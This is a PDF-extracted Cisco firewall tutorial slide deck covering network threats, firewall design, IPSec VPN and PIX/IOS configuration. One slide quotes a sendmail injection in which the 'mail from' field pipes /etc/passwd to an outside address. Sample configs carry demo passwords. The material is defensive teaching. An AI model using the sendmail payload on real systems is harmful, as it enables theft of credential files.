8/13/2019 Cisco - Internet Firewall Technology Tutorial
1/90
10999_03F8_c2
NW98_US_407
Internet
FirewallTechnology
Tutorial
0999_03F8_c2
NW98_US_407
8/13/2019 Cisco - Internet Firewall Technology Tutorial
2/90
20999_03F8_c2
NW98_US_407
Agenda
MotivationThreats and Attacks
Business Need
Design and Test Principles
Policy
Architecture Design Implementation
Cisco Solutions
8/13/2019 Cisco - Internet Firewall Technology Tutorial
3/90
30999_03F8_c2
NW98_US_407
Motivation:Security Threatsand Common
Network Attacks
8/13/2019 Cisco - Internet Firewall Technology Tutorial
4/904
0999_03F8_c2
NW98_US_407
Security Threats
Bob
Impersonation
BankCustomer
Deposit $1000 Deposit $100
Loss of Integrity
CPU
Denial of Service
Loss of Privacy
telnet foo.bar.org
username: danpassword:
m-y-p-a-s-s-w-o-r-d d-a-n
Im Bob, SendMe all CorporateCorrespondence
with Cisco
8/13/2019 Cisco - Internet Firewall Technology Tutorial
5/9050999_03F8_c2
NW98_US_407
Exploit Host Weaknesses
10.1.1.1
Good Bye
8/13/2019 Cisco - Internet Firewall Technology Tutorial
6/9060999_03F8_c2
NW98_US_407
Common Attacks
Routing attacks
Wiretapping
Active content
ICMP attacks
Denial of service attacks
TCP sequence attacks
8/13/2019 Cisco - Internet Firewall Technology Tutorial
7/9070999_03F8_c2
NW98_US_407
Send Mail Attacks
Grabbing the/etc/password file Injecting a file or running a script
mail from: "|/bin/mail [email protected] < /etc/passwd"
250 "|/bin/mail [email protected] < /etc/passwd"... Sender ok
rcpt to: mickeymouse
550 mickeymouse... User unknown
data
354 Enter mail, end with "." on a line by itself250 Mail accepted
quit
8/13/2019 Cisco - Internet Firewall Technology Tutorial
8/9080999_03F8_c2
NW98_US_407
Password Cracking
Features: graphical brute forcing,
cracking NT passwords, network session
8/13/2019 Cisco - Internet Firewall Technology Tutorial
9/9090999_03F8_c2
NW98_US_407
Newer Internet Attacks
Teardrop 1A fragmentation attack that works by exploitinga reassembly bug with overlapping fragments,and causes the targeted system to crashor hang
Teardrop 2The first fragment starts at offset 0 and thesecond fragment is within the TCP header
LandTakes a SYN packet with source addressand port are the same as the destination
8/13/2019 Cisco - Internet Firewall Technology Tutorial
10/9010
0999_03F8_c2
NW98_US_407
Other Items
SNMP v1 strings
CERT advisories
X11, RPC, NIS, NFS,NTP, finger
UDP high ports TCP high ports
8/13/2019 Cisco - Internet Firewall Technology Tutorial
11/9011
0999_03F8_c2
NW98_US_407
Service Configuration
no service fingerno service padno service tcp-small-serversno service udp-small-servers
no ip bootp serverno ip source-route
service password-encryptionenable secret YellowMegaMan
no enable password
no ip redirectno ip directed-broadcastno ip proxy-arp
8/13/2019 Cisco - Internet Firewall Technology Tutorial
12/9012
0999_03F8_c2
NW98_US_407
Motivation:
Business Need
8/13/2019 Cisco - Internet Firewall Technology Tutorial
13/90
130999_03F8_c2
NW98_US_407
Traditional Business
Employees
Partners
Customers
SuppliersEnterprise
8/13/2019 Cisco - Internet Firewall Technology Tutorial
14/90
140999_03F8_c2
NW98_US_407
The Need to Be Networked
A new model of information technology
Being connected is not enough,electronic commerce is not enough
You need to be networked to all yourimportant constituencies
Open up internal operational systemsand information to prospects, customers,partners, suppliers, and employees
8/13/2019 Cisco - Internet Firewall Technology Tutorial
15/90
150999_03F8_c2
NW98_US_407
The Global Networked Business
Employees Customers
Partners SuppliersEnterprise
8/13/2019 Cisco - Internet Firewall Technology Tutorial
16/90
160999_03F8_c2
NW98_US_407
Design: Policy
8/13/2019 Cisco - Internet Firewall Technology Tutorial
17/90
170999_03F8_c2
NW98_US_407
What Are the Business ProblemsYou are Trying to Solve?
Internet
BusinessNeed
Security Considerations
Internet
Access
InternetPresence
NetworkedCommerce
VPN andExtranets
8/13/2019 Cisco - Internet Firewall Technology Tutorial
18/90
What Are their Risks?
RSF: Risk-Safeguard FactorRVF: Risk-Value FactorSTF: Safeguard-Threat Factor
R: Risk
S: SafeguardT: ThreatV: ValueW: Weakness
SVF
RSF
VTF
WTF
RVF
++
+ +
+
+-
--
-
SVF: Safeguard-Value FactorVTF: Value-Threat FactorWTF: Weakness-Threat Factor
R TV S W
STF
180999_03F8_c2
NW98_US_407
8/13/2019 Cisco - Internet Firewall Technology Tutorial
19/90
190999_03F8_c2
NW98_US_407
Simplified Causal Diagram
+
-+
+
-
Weakness
-
Risk Value
AssuranceSafeguard
Threat
+
Threat: Hazards facing the information (attacks/time)Weakness: Vulnerability of the processing ($/attack)Safeguard: Methods of protection ($/time)Value: Dollar value of information ($)Assurance: Confidence factor ($/time)
8/13/2019 Cisco - Internet Firewall Technology Tutorial
20/90
200999_03F8_c2
NW98_US_407
Internet Access
ApplicationsWeb access and e-mail (using an external mail server)
Streaming audio/video
Security issuesProtection of internal resources from outsidersLimiting external privileges of internal users
Visibility of internal network addresses
Auditing usage and possible attacks
Internet
8/13/2019 Cisco - Internet Firewall Technology Tutorial
21/90
210999_03F8_c2
NW98_US_407
Internet Presence
Additional applicationsE-mail server managed locally
Web server
Additional security issuesProtection of public resources
Separation of public and internal networks
Authentication of remote users
WWW
Internet
8/13/2019 Cisco - Internet Firewall Technology Tutorial
22/90
220999_03F8_c2
NW98_US_407
Networked Commerce
Additional applications
Electronic commerce with controlled accessto business systems for ordering, etc.
Additional security issuesSecure gateway-internal communication
Client-commerce gateway encryption
Strong application authentication of client
CommerceGateways
InternalBusinessSystems
Internet
8/13/2019 Cisco - Internet Firewall Technology Tutorial
23/90
230999_03F8_c2
NW98_US_407
VPN and Extranets
Additional applicationsPrivate connections over public network
Virtual Private Network (VPN)
Additional security issuesEncryption between remote users/sites and HQ
Very strong network authentication of client
HQRemoteSite
Mobile and
Home Users
Extranet
Partner
Internet
8/13/2019 Cisco - Internet Firewall Technology Tutorial
24/90
240999_03F8_c2
NW98_US_407
Design:
Architecture
8/13/2019 Cisco - Internet Firewall Technology Tutorial
25/90
What Is a Firewall?
I think it was Pope Urban that first attempted a definitionin 1094. He enforced his definition in 1095-1099. Zangi,
the Prince of Mosul refuted it in 1144 and Saladin was leftto stave off Pope Eugenius III and St. Bernard between 1146
and 1148. And, as everyone knows, Richard the Lion Hearteddebated the definition with Saladin between 1189 and 1192
without a resolution. All of this is to say that this can becomea religious issue and many deaths will occur from it.
Chris Lonvick25
0999_03F8_c2
NW98_US_407
8/13/2019 Cisco - Internet Firewall Technology Tutorial
26/90
260999_03F8_c2
NW98_US_407
Security Technology Taxonomy
IdentityAccurately identify network usersand their privileges
IntegrityNetwork integrity through:Secure network perimetersPrivacy and encryptionReliable operation
Active AuditProvide auditing, accounting andactive detection and response
UNIVERSALPASSPORT
USA
UNIVERSALPASSPORT
USA
UNIVERSALPASSPORT
8/13/2019 Cisco - Internet Firewall Technology Tutorial
27/90
270999_03F8_c2
NW98_US_407
Firewall Design CriteriaOne
Where is your policy? Implement it
Hosts offering public services/access
are not secure Internal network hosts should not
offer public services/access
Private networks and hosts shouldnot be visible
8/13/2019 Cisco - Internet Firewall Technology Tutorial
28/90
280999_03F8_c2
NW98_US_407
Firewall Design CriteriaTwo
Know your network
Security for multiple Internet access points
Management and operation comfort
Network security cannot replacedata security
Detailed security and usageaccounting
8/13/2019 Cisco - Internet Firewall Technology Tutorial
29/90
290999_03F8_c2
NW98_US_407
Firewall Design CriteriaThree
A robust firewall is typicallynot one device
Layered topology; defense in depth
Redundancy and failover
Response plan
8/13/2019 Cisco - Internet Firewall Technology Tutorial
30/90
300999_03F8_c2
NW98_US_407
Internet Access Firewall Topology
Outside
Reasonable features and
performance at a low cost
Usually a router withfirewall capabilities
8/13/2019 Cisco - Internet Firewall Technology Tutorial
31/90
310999_03F8_c2
NW98_US_407
Internet Presence Firewall Topology
Dedicated firewall platforms
Multiple interfaces/layers
Many features, high performance
Outside
DemilitarizedZones (DMZs)
Public Access Server
Public Access Server
8/13/2019 Cisco - Internet Firewall Technology Tutorial
32/90
320999_03F8_c2
NW98_US_407
Lock-and-Key
Situation: you want a subset ofhosts on a network to accessa host on a remote network
protected by a firewall
With lock-and-key access, youcan enable only a desired set ofhosts to gain access by havingthem authenticate through aTACACS+ server
8/13/2019 Cisco - Internet Firewall Technology Tutorial
33/90
330999_03F8_c2
NW98_US_407
Lock-and-Key Configuration
aaa authentication login lockkey tacacs+ enable
access-list 101 dynamic telecommuter timeout 5 permitip any any
access-list 101 permit tcp any 10.1.1.1 eq 23
interface e0ip address 10.1.1.1 255.255.255.0
ip access-group 101 in
tacacs-server host 1.1.1.1
tacacs-server key cisco
line vty 0 4
password 7 telecommuter
login authentication lockkey
autocommand access-enable timeout 2
8/13/2019 Cisco - Internet Firewall Technology Tutorial
34/90
340999_03F8_c2
NW98_US_407
Networked Commerce
Coupled gateway and application servers
Encryption and authentication
OutsideWebEncryptedTransaction
8/13/2019 Cisco - Internet Firewall Technology Tutorial
35/90
350999_03F8_c2
NW98_US_407
VPNs and Extranets
Strong encryption, authenticationRouters, firewalls, end systems
8/13/2019 Cisco - Internet Firewall Technology Tutorial
36/90
360999_03F8_c2
NW98_US_407
Internet
InternalNetwork
IPSec: Standard for VPN Encryption
Standards complianceIPSec AH/ESP encapsulated tunnels
IKE key management
Fully interoperableCisco IOS, Firewalls, and other IPSec-compliant systems
Client supportWindows 95 and Windows NT 4.x (Cisco provided software)
Windows NT 5.0 (Microsoft/Cisco partnership)
Encrypted IP
IPS M d
8/13/2019 Cisco - Internet Firewall Technology Tutorial
37/90
370999_03F8_c2
NW98_US_407
IPSec Modes
IP HDR
May Be Encrypted
IP HDR Data
IPsec HDR Data
IP HDR Data
IPsec HDR IP HDRNew IPHDR
May Be Encrypted
Data
Tunnel Mode
Transport Mode
Vi t l P i t N t k E l
8/13/2019 Cisco - Internet Firewall Technology Tutorial
38/90
380999_03F8_c2
NW98_US_407
Virtual Private Network Example
128.49.48.1
Clear ClearEncrypted
128.49.54.1
VPN C fi ti
8/13/2019 Cisco - Internet Firewall Technology Tutorial
39/90
VPN Configuration
crypto ipsec transform-set first ah-md5-hmac
mode tunnelcrypto ipsec transform-set second ah-sha-hmacesp-des mode tunnel!crypto isakmp policy 5
auth rsa-encrhash md5
lifetime 3600!crypto map toBob 10 ipsec-isakmp
set peer 128.49.54.1set transform-set first secondmatch address 155
!interface e0
ip address 128.49.48.1 255.255.255.0crypto map toBob
!access-list 155 permit ip 128.49.48.1 0.0.0.255128.49.54.1 0.0.0.255
Define IPsec policy:Two transform sets providingencryption and authentication
Set IKE policy
Create a crypto mapdefine negotiating peerprioritize IPsec policymatch an access list
Configure interface,assign crypto map
Define access-list toencrypt all traffic
390999_03F8_c2
NW98_US_407
8/13/2019 Cisco - Internet Firewall Technology Tutorial
40/90
400999_03F8_c2
NW98_US_407
Design: Test
Fi ll T t C it i O
8/13/2019 Cisco - Internet Firewall Technology Tutorial
41/90
410999_03F8_c2
NW98_US_407
Firewall Test CriteriaOne
Where is your policy?Who controls routers?
Who controls firewalls?
Who makes up the security team?
Check policy and well-known holes
Scan the network
Test the firewall and the services behind it
Use verification and IDS tools
Firewall Test Criteria Two
8/13/2019 Cisco - Internet Firewall Technology Tutorial
42/90
420999_03F8_c2
NW98_US_407
Firewall Test CriteriaTwo
Do things work as expected?
Scan firewall
Scan DMZ and servicesScan internal network
Invert policy rules on sniffer
Log and document everything
Logging
8/13/2019 Cisco - Internet Firewall Technology Tutorial
43/90
430999_03F8_c2NW98_US_407
Logging
service timestamps debug datetime msecservice timestamps log datetime msec
logging buffered 16384logging trap debugginglogging 169.222.32.1logging source-interface loopback0
access-list 101 permit tcp any 10.1.1.1 eq 23 logging
ip ftp source-interface loopback0
ip ftp username c7200ip ftp password 7 8675309Gexception protocol ftpexception dump 10.1.1.1
Firewall Test Criteria Three
8/13/2019 Cisco - Internet Firewall Technology Tutorial
44/90
440999_03F8_c2NW98_US_407
Firewall Test CriteriaThree
Testing never ends
Know your network
Review logs
Educate staff and users
Keep revisions up to date
8/13/2019 Cisco - Internet Firewall Technology Tutorial
45/90
450999_03F8_c2NW98_US_407
Implementation:
Cisco Solutions
Cisco Firewall Product Line
8/13/2019 Cisco - Internet Firewall Technology Tutorial
46/90
460999_03F8_c2NW98_US_407
Cisco Firewall Product Line
Performance
Feature
Set
Cisco 1600/2500with Cisco IOS FW Features
CentriFirewallfor Windows NT
PIXFirewall
Supported Applications
8/13/2019 Cisco - Internet Firewall Technology Tutorial
47/90
470999_03F8_c2NW98_US_407
Supported Applications
Telnet, Web, FTP, and SMTP
RealAudio, RealVideo, and VDOLive
Lotus Notes, IMAP, and LDAP DNS resolves and zone transfers
RPC, R-Commands Other generic IP, TCP, and UDP
8/13/2019 Cisco - Internet Firewall Technology Tutorial
48/90
Java Blocking
8/13/2019 Cisco - Internet Firewall Technology Tutorial
49/90
490999_03F8_c2NW98_US_407
Inspect Port Command
Drops the Packet
HTTP Request
Java Signature
Server Reply
Requests for Java Applet
N
No Java SignatureLets it Through
Inspect
Web Server
Web Client
Java Blocking
Attack Detection and Prevention
8/13/2019 Cisco - Internet Firewall Technology Tutorial
50/90
500999_03F8_c2NW98_US_407
Attack Detection and Prevention
Events
Monitors the following statisticsand conditions:
Total embryonic connections
Per minute incoming new connection rate
Timer for TCP connections to reach established state
Packet count for duplicate syn packets
Packet sequence numbers
Alerts
8/13/2019 Cisco - Internet Firewall Technology Tutorial
51/90
510999_03F8_c2NW98_US_407
Alerts Non-statistical events
may trigger alerts Alerts set on groups of
events or specific ones
DoS attacks, SMTPcommand attacks, ordenied Java applet
Alerts are visual, email,and pager
Thresholds limit thenumber of alerts issueswhen repeating in agiven timeframe
Email is based on MAPI(install Messaging)
Beeper is based on TAPI
Adaptive Security Algorithm (ASA)
8/13/2019 Cisco - Internet Firewall Technology Tutorial
52/90
530999_03F8_c2NW98_US_407
Adaptive Security Algorithm (ASA)
Provides stateful connection policy
Connections allowed outallows returnsession backflow; incoming connectionsmust be explicitly enabled
Initial TCP sequence number randomized
Tracks source and destination ports +addresses, TCP sequences, andadditional TCP flags
Access control list (ACL) policy support UDP + TCP session state
TCPFIN bit
UDPOne minute default timer (except for DNS)
TCP ConnectionsInside to OutsideI iti li ti Ph
8/13/2019 Cisco - Internet Firewall Technology Tutorial
53/90
Assume data length = 100 octets;Checksum is modified not recalculated
Initialization Phase
PIX Checks if aTranslation Exists
or Not. If Not itCreates One Upon
Verifying NAT,Global, Access
Control andAuthentication, ifAny a Connection
Is Also Created
Back Spoofing
Sender736310.0.0.14
171.68.10.2
4005
23
100
4512
Sync
Data
Checksum
Destination Port
Checksum
Code
Acknowledge
PIX6514171.69.236.5
171.68.10.2
4005
23
3050
3124
Sync
IP
Spoofing
Connection
Receiver andResponder
3214
171.68.10.2
171.69.236.5
23
4005
31
4321
3151
IP
TCP
PIX follows adaptivesecurity algorithm
(Src IP, src port,
dest IP, dest port) check Sequence number check
Translation check
If the packet code bit was notsyn-ack, packet would havebeen dropped and logged
4321
171.68.10.2
10.0.0.14
23
4005
31
Sync-Ack
2143
201
Source IP Address
Destination IP Address
Source Port
Sequence Number
540999_03F8_c2NW98_US_407
TCP ConnectionsInside to OutsideD t T f
8/13/2019 Cisco - Internet Firewall Technology Tutorial
54/90
550999_03F8_c2NW98_US_407
Data Transfer
171.68.10.2
171.69.236.5
171.69.236.5
Since ACK Bit isSet, Connection andTranslation Entries
Should Exist
Sender4512
10.0.0.14
171.68.10.2
4005
23
201
3412
ACK
Data
132
Checksum
Source IP Address
Destination IP Address
Source Port
Destination Port
Sequence Number
Checksum
Code
Acknowledge
PIX3912
171.68.10.2
4005
23
3151
1234
ACK
3111
171.68.10.2
10.0.0.16
234005
132
3311
ACK
233
Receiver and
Responder2216
23
4005
132
2222
3252
ASA Checks Again
132
ACK
TCP ConnectionsInside to OutsideT i ti Ph
8/13/2019 Cisco - Internet Firewall Technology Tutorial
55/90
560999_03F8_c2NW98_US_407
Assume data length = 100 octets;Checksum is modified not recalculated
Termination Phase
171.68.10.2
171.69.236.5
171.68.10.2
171.68.10.2
171.68.10.2
171.69.236.5
Back Spoofing
Sender
1111
10.0.0.14
4005
23
1000
2222
FIN
Data
8000
PIX
2222
4005
23
3950
2222
FIN
1111
10.0.0.14
23
4005800
1111
FIN-ACK
1101
Receiver andResponder
4512
23
4005
800
2121
4051
PIX will only accept a packet withcode-bit FIN-ACK
All other packets dropped
Any packet after this packet wouldalso be dropped
Connection released immediately
Translation released after x-late time out
800
FIN-ACK
ChecksumSource IP Address
Destination IP Address
Source Port
Destination Port
Sequence Number
ChecksumCode
Acknowledge
Static vs. Conduit
8/13/2019 Cisco - Internet Firewall Technology Tutorial
56/90
570999_03F8_c2NW98_US_407
Static vs. Conduit Static
A static maps a global (outside) address to an inside(local) address. Any access to the global goes to themapped inside address. This gives an inside machinewith an illegal address a presence on the outside witha legal address. A static is secure (protected).
Conduit:
A conduit is a hole through the firewall allowingoutside machines to initiate connections to inside
machines. It is related to a static in that a static mapsa global address to a local machine. Conduits areonly as secure as you make them. They are usedfor service items.
Authorization
8/13/2019 Cisco - Internet Firewall Technology Tutorial
57/90
580999_03F8_c2NW98_US_407
Internet
Intranet
DNS/Mail
DMZ
ut o at oTelnet
Joe
InsideHost A
PIX Firewall
Internet
Cisco Secure
Joe
User Profileid=JoeFail=0
Service=ShellCmd=Telnet{Permit Host A}Cmd=FTP{Permit Host B}
SYN Flood Defender
8/13/2019 Cisco - Internet Firewall Technology Tutorial
58/90
590999_03F8_c2NW98_US_407
Throttles both internal and
external maximum sessionsInboundcontrols SYN flooding(denial of service)
Outboundlimits maximum sessions(controls applications such asMicrosofts Internet Explorer)
Protects session resources
from being depleted Maintains high network reliability
SYN Floods Trying to KILLM il S
8/13/2019 Cisco - Internet Firewall Technology Tutorial
59/90
600999_03F8_c2NW98_US_407
All AllowedCommands
OutsideInside
MailServer
Internet
SMTP
Mail Server
SynSyn
Syn
PIX Limit 2
Syn
AllowedAllowed
Stopped
Content Filter Trying to
8/13/2019 Cisco - Internet Firewall Technology Tutorial
60/90
610999_03F8_c2NW98_US_407
All AllowedCommands
MailServer
InternetSMTP
Debug
OK
NOOP
Get INFO
OutsideInside
Client VPNPIX Ravlin IPSec
8/13/2019 Cisco - Internet Firewall Technology Tutorial
61/90
620999_03F8_c2NW98_US_407
Standards complianceIPSec AH/ESP encapsulated tunnel
IKE key management
Wire-speed performance
Ethernet nowFast Ethernet late CY 98
Fully interoperableCisco IOS and otherIPSec-compliant systems
Internet
InternalNetwork
Encrypted IP
PIX with OTP Configuration
8/13/2019 Cisco - Internet Firewall Technology Tutorial
62/90
630999_03F8_c2NW98_US_407
g
Configuration on the PIX manager:Go to PIX manager: URL= 10.0.0.0.100:8080username = pixadmin password = cisco
On PIX manager: Click authenticationSelect TACACS+ server Click add
Server IP address = 10.0.0.100Encryption key: spackle Click OK
On PIX manager:Select authentication Click addSelect authenticate all
internal hosts or whateveris desired. Click OK. Click save.
Assume pin = 1234Passcode = 5551212
PIX with OTP Session
8/13/2019 Cisco - Internet Firewall Technology Tutorial
63/90
640999_03F8_c2NW98_US_407
Telnet prompt:Username: megaman
Enter passcode: 5551212
HTTP prompt: (Internet Explorer)You need a password toaccess this page
Resource HTTP authentication
Username megaman
Password 5551212
HTTP prompt: (Netscape)
Username and password requiredEnter username for HTTPauthentication at 172.16.50.87
User name megaman
Password 5551212
FTP prompt:Connected to 172.16.50.87
220FTP authentication 220
User (172.16.50.87:>:
331Enter PASSCODE: 331
Password:230220 TS09B6F FTP server(version Cisco Micro WebServer)ready
331Hello root, send password
230Login user root OK 230
PIX with Three Interfaces
8/13/2019 Cisco - Internet Firewall Technology Tutorial
64/90
650999_03F8_c2NW98_US_407
A web server for the inside
network. Access allowedonly from 172.28.0.0and 172.16.50.0
Public Network
Internet
Perimeter Network
Private Network
FTP Server
192.168.0.3
WebServer
192.168.0.2
10.0.0.100
192.168.0.1
10.0.0.3
PIX with Three Interfaces
8/13/2019 Cisco - Internet Firewall Technology Tutorial
65/90
660999_03F8_c2
NW98_US_407
nameif ethernet0 outside security0nameif ethernet1 inside security100nameif ethernet2 dmz security50enable password 8Ry2YjIyt7RRXU24 encryptedpasswd 2KFQnbNIdI.2KYOU encryptedhostname pixfirewallfailovernamesname 192.168.0.2 webservername 192.168.0.3 ftpserver
pager lines 24syslog output 20.3no syslog consoleinterface ethernet0 autointerface ethernet1 autointerface ethernet2 autoip address outside 172.16.50.3 255.255.255.0ip address inside 10.0.0.3 255.0.0.0
ip address dmz 172.168.0.1 255.255.255.0arp timeout 14400global (outside) 1 172.16.50.76-172.16.50.85global (dmz) 1 192.168.0.90-192.168.0.99nat (inside) 1 10.0.0.0 255.0.0.0nat (dmz) 1 192.168.0.0 255.255.255.0static (dmz,outside) 172.16.50.76 webserver 200 200static (dmz,outside) 172.16.50.77 ftpserver
PIX with Three Interfaces
8/13/2019 Cisco - Internet Firewall Technology Tutorial
66/90
670999_03F8_c2
NW98_US_407
static (inside,outside) 172.16.50.80 10.0.0.110conduit (dmz,outside) 172.16.50.76 80 tcp 0.0.0.0 0.0.0.0conduit (dmz,outside) 172.16.50.77 21 tcp 0.0.0.0 0.0.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.28.0.0 255.255.0.0conduit (inside,outside) 172.16.50.80 80 tcp 172.28.0.0 255.255.0.0conduit (inside,outside) 172.16.50.80 21 tcp 172.16.50.0 255.255.255.0conduit (inside,outside) 172.16.50.80 80 tcp 172.16.50.0 255.255.255.0age 10rip outside passiveno rip outside defaultrip inside passive
rip inside defaultno rip dmz passiverip dmz defaultroute outside 0.0.0.0 0.0.0.0 172.16.50.1 1timeout xlate 24:00:00 conn 12:00:00 udp 0:02:00timeout rpc 0:10:00 h323 0:05:00 uauth 0:05:00tacacs-server host 10.0.0.100 abcaaa authentication any inbound 0.0.0.0 0.0.0.0 tacacs+
no snmp-server locationno snmp-server contactsnmp-server community publictelnet 10.0.0.100 255.255.255.255mtu outside 1500mtu inside 1500mtu dmz 1500: end
Centri Firewall
8/13/2019 Cisco - Internet Firewall Technology Tutorial
67/90
680999_03F8_c2
NW98_US_407
Windows NT Firewall
ICSA certified
Version 4.0.2 now shipping!
Evaluation softwareon the web at:http://www.cisco.com/centri
Ease of Use
8/13/2019 Cisco - Internet Firewall Technology Tutorial
68/90
690999_03F8_c2
NW98_US_407
Installation Wizard
Steps through initial configurationPredefined security policies
Graphical policy managerDrag-and-drop security policies
Secure remote administration
Secure Remote Administration
8/13/2019 Cisco - Internet Firewall Technology Tutorial
69/90
700999_03F8_c2
NW98_US_407
ISPNetwork
Private Network
Private Network
Private NetworkInternet
Secure remote admin
MS authenticated RPC
Centris asymmetricauthentication
From trusted oruntrusted sides
Reporting
8/13/2019 Cisco - Internet Firewall Technology Tutorial
70/90
710999_03F8_c2
NW98_US_407
Reports may be run on demand and scheduled to run
at fixed times (e.g. Mondays at 2 a.m.)
Reports are presented in HTML or Text and may bestored on the web server in the product (examiner)or sent to an e-mail address
To view reports it is simple to use the imbedded browserin Centri though you may use another browser if desired(port 8080no authentication)
There are three types of reports:
Warning (security issues and product oddities)Service (statistical details per service, no aggregates)
Connection (polls for open connections per service, no aggregates)
Flexible Security Policies
8/13/2019 Cisco - Internet Firewall Technology Tutorial
71/90
720999_03F8_c2
NW98_US_407
161.44.75.12By IP Address
By NTUsername
By Application
Security Policy
Open
Restrictive
Closed
By Timeof Day
Centri Firewall Architecture
8/13/2019 Cisco - Internet Firewall Technology Tutorial
72/90
730999_03F8_c2
NW98_US_407
Kernel ProxiesImplemented in Windows NT Kernel
Custom TCP/IP stack
Packet-filtering speedProxy functionality
Protects against common vulnerabilities inWindows NT (WinNuke, NetBIOS holes, etc.)
Intercept architecturePreservation of original network stack
Firewall communication is also protected
Capability of running servers on the firewall
Internet
Centri Firewall Design
8/13/2019 Cisco - Internet Firewall Technology Tutorial
73/90
74
0999_03F8_c2
NW98_US_407
VirtualInterface10.0.0.2
MicrosoftTCP/IPStack
Kernel Proxy
3rd-Party Apps
(DNS, Web, E-mail)
OutsideInterface
InsideInterface
192.204.18.2 10.0.0.1
Content
FilteringAuthentication
DeviceDriver
NT Kernel
Application
Layer
Other
Services
Kernel ProxySampleInboundData Flow
8/13/2019 Cisco - Internet Firewall Technology Tutorial
74/90
75
0999_03F8_c2
NW98_US_407
ApplicationSpace
KernelSpace
LocalCommunication
Channel
InternalProtocolStack
Centri Agents(e.g., Authentication)
205.50.50.2 10.0.0.1
Winsock
CentriVirtualAdapter
Native Microsoft NTTCP/IP Stack
Winsock Applications
(e.g., Web, DNS,MailServers)
10.0.0.2
TrustedServer
TrustedNetworkAdapter
UntrustedNetworkAdapter
Interceptor
SecurityVerification Engine
ExternalProtocolStack
Kernel ProxySampleNative StackData Flow
8/13/2019 Cisco - Internet Firewall Technology Tutorial
75/90
76
0999_03F8_c2
NW98_US_407
CentriVirtualAdapter
ApplicationSpace
KernelSpace
LocalCommunication
Channel
TrustedNetworkAdapter
Interceptor
SecurityVerification Engine
ExternalProtocolStack
Centri Agents(e.g., Authentication)
205.50.50.2 10.0.0.1
Winsock
Native Microsoft NTTCP/IP Stack
Winsock Applications
(e.g., Web, DNS,MailServers)
10.0.0.2
InternalProtocolStack
UntrustedNetworkAdapter
Site-Based Model
8/13/2019 Cisco - Internet Firewall Technology Tutorial
76/90
77
0999_03F8_c2
NW98_US_407
Policy enforcement occurs when
information passes between sites(intersite), not within the samesite (intrasite)
Rules are checked wheninformation leaves onesite for another
Install creates two sitestrusted and Internetwhichmay be expanded upon
post-install (e.g. adding anisolated service network [DMZ])
The local stack is tied by avirtual wire to a trusted site
Policy RulesChecked
IsolatedService
Network
InternetTrusted
Eight Kernel Proxies
8/13/2019 Cisco - Internet Firewall Technology Tutorial
77/90
78
0999_03F8_c2
NW98_US_407
IP
Source/destination checksPing- of-death prevention
IP spoof prevention
ICMPMessage type
TCPPort check
SYN flood prevention
UDP
Port check SMTP
Nested routing blocking
Minimal protocol set
Similar to Mail Guard
FTP
Inline user authenticationNon-transparent proxy mode
Allowed action checks
TelnetInline user authentication
Non-transparent proxy modePort check
HTTPInline user authentication
URL filtering
Java/ActiveX/Java Script Blocking
Allowed action checks
Centri Summary
8/13/2019 Cisco - Internet Firewall Technology Tutorial
78/90
79
0999_03F8_c2
NW98_US_407
High-performance Kernel Proxy firewall
Uses four breakthroughs in firewall userinterface design:
Natural network views
Bundled applications
Policy builder
Drag-and-drop policy deployment
Integrates well into Microsoft environment Policies based on NT domains, groups,
and users
Cisco IOS
8/13/2019 Cisco - Internet Firewall Technology Tutorial
79/90
80
0999_03F8_c2
NW98_US_407
Integrated security is not anew concept
Existing Cisco IOS security
technologies support:Perimeter security and access controlIdentification and user authentication
Denial of service (DoS) protection
Virtual private networking
Reporting
Existing Cisco IOSPerimeterSecurity Technologies
8/13/2019 Cisco - Internet Firewall Technology Tutorial
80/90
81
0999_03F8_c2
NW98_US_407
Access control lists Network address
translation (NAT)
VPN technologiesAuthentication
Network-layer encryption
Tunneling (GRE, L2F)
Peer router
Policy-basedmulti-interfacesupport
Event logging
TACACS+/RADIUSauthentication
Lock-and-key
security
Cisco IOS Firewall Feature SetEnhanced Security for
8/13/2019 Cisco - Internet Firewall Technology Tutorial
81/90
82
0999_03F8_c2
NW98_US_407
Context-Based Access Control (CBAC)Secure, per-application filtering
Support for advanced protocols(H.323, SQLnet, RealAudio, etc.)
Control downloading of Java applets
Denial of service detection and prevention
Real-time alerts TCP/UDP transaction log
Configuration and management
Enhanced Security for
the Intelligent Internet
Benefits...
I t t d l ti d it
8/13/2019 Cisco - Internet Firewall Technology Tutorial
82/90
83
0999_03F8_c2
NW98_US_407
Integrated solutionaccess and security
No new hardware requiredone box to manage
Full routing functionality
Applicable for Internet, intranet andextranet security
Full Cisco IOS software interoperability:customers can leverage their knowledge
of Cisco IOS software Low cost of implementation and
ownership for Cisco-installed base
Context-Based AccessControl (CBAC)
8/13/2019 Cisco - Internet Firewall Technology Tutorial
83/90
84
0999_03F8_c2
NW98_US_407
Tracks state and context of networkconnections to secure traffic flow
Inspects data coming into or leaving router
Allows connections to be established bytemporarily opening ports based onpayload inspection
Return packets authorized for particularconnection only via temporary ACL
Context-Based Access Control(CBAC) Application Support
8/13/2019 Cisco - Internet Firewall Technology Tutorial
84/90
85
0999_03F8_c2
NW98_US_407
Transparent support forcommon TCP/UDP Internetservices, including WWW,Telnet, SNMP, finger, etc.
FTP
TFTP
SMTP
Java blocking
BSD R-cmds Oracle SQL Net
Remote-procedure call (RPC)
Multimedia applications:VDOnets VDO Live
RealNetworks RealAudio
Intels InternetVideo Phone (H.323)
Microsofts NetMeeting (H.323)
Xing Technologies Streamworks
Whitepines CuSeeMe
IOS Firewall Transaction Log
8/13/2019 Cisco - Internet Firewall Technology Tutorial
85/90
86
0999_03F8_c2
NW98_US_407
Provides audit trail for tracking transactions Recognition of session and port
Information is sortable via tag
Sample:Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL:tcp session initiator (172.166.1.13:33192) sent 22 bytesresponder (172.166.129.11:25) sent 208 bytes
Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL:tcp session initiator (172.166.1.13:33194) sent 336 bytesresponder (172.166.129.11:25) sent 325 bytes
Sample Configuration
8/13/2019 Cisco - Internet Firewall Technology Tutorial
86/90
87
0999_03F8_c2
NW98_US_407
ip inspect name pri-net tcp
ip inspect name pri-net udpip inspect name pri-net ftpip inspect name pri-net h323ip inspect name pri-net realaudioip inspect name pri-net streamworks
ip inspect name pri-net vdoliveip inspect name pri-net cuseemeip inspect name pri-net http java-list 10
interface e0ip inspect pri-net in
ip access-group 101 out
access-list 10 permit 172.34.7.130access-list 101 deny ip any any
CFMI
